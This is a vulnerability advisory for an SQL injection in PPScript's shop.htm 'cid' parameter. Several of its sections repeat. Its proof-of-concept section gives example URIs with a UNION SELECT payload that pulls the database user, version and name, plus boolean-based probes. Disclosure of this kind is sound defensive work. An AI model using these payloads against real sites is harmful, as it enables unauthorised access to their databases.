PPScript 'shop.htm' SQL Injection Vulnerability
BID:42539
Info
PPScript 'shop.htm' SQL Injection Vulnerability
| Bugtraq ID: | 42539 |
| Class: | Input Validation Error |
| CVE: |
CVE-2009-4724 |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 03 2009 12:00AM |
| Updated: | Aug 03 2009 12:00AM |
| Credit: | MizoZ |
| Vulnerable: |
PaymentProcessorScript PPScript 0 |
| Not Vulnerable: | |
Discussion
PPScript 'shop.htm' SQL Injection Vulnerability
PPScript is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
PPScript is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
PPScript 'shop.htm' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/shop.htm?cid=999999999+union+select+1,2,concat(user(),0x3a,version(),0x3a,database())
http://www.example.com/shop.htm?cid=31+and+1=1
http://www.example.com/shop.htm?cid=31+and+1=100
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/shop.htm?cid=999999999+union+select+1,2,concat(user(),0x3a,version(),0x3a,database())
http://www.example.com/shop.htm?cid=31+and+1=1
http://www.example.com/shop.htm?cid=31+and+1=100
Solution / Fix
PPScript 'shop.htm' SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
PPScript 'shop.htm' SQL Injection Vulnerability
References:
References:
- PPScript Homepage (PaymentProcessorScript)